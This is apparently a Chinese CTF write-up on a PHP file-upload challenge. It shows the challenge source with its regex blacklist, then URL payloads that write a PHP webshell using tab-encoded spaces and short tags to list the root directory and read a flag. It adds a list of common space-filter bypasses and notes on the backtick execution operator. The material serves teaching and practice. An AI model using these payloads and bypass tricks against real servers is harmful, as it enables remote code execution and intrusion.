目录
信息收集
payload
补充知识
信息收集
代码审计
<?php
error_reporting(0);
highlight_file(__FILE__);
function check($input){
if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){
// if(preg_match("/'| |_|=|php/",$input)){
die('hacker!!!');
}else{
return $input;
}
}
function waf($input){
if(is_array($input)){
foreach($input as $key=>$output){
$input[$key] = waf($output);
}
}else{
$input = check($input);
}
}
$dir = 'sandbox/' . md5($_SERVER['REMOTE_ADDR']) . '/';
if(!file_exists($dir)){
mkdir($dir);
}
switch($_GET["action"] ?? "") {
case 'pwd':
echo $dir;
break;
case 'upload':
$data = $_GET["data"] ?? "";
waf($data);
file_put_contents("$dir" . "index.php", $data);
}
?>payload
?action=pwd
?action=upload
&data=<?%09echo%09system("ls%09/")%09?>
?action=upload
&data=<?%09echo%09system("cat%09/flllllll1112222222lag")%09?>
补充知识
需要写入的数据:
<?php system('ls \')?>
php被过滤了改成<?=?>标签,这个<?= ?>
' 被过滤了可以用"替换
空格被过滤了用\t
空格常见的绕过如下
IFS$9 、 %09 、 < 、 > 、 <> 、 {,} 、 %20 、 ${IFS}
%20 %09 %0a %0b %0c %0d %a0 %00 /**/ /!/
PHP 支持一个执行运算符:反引号(``)。PHP 将尝试将反引号中的内容作为 shell 命令来执行,并将其输出信息返回(赋给一个变量而不是简单地丢弃到标准输出)。使用反引号运算符的效果与函数shell_exec() 相同。
注意:
关闭了 shell_exec() 时反引号运算符是无效的。
与其它某些语言不同,反引号不能在双引号字符串中使用。
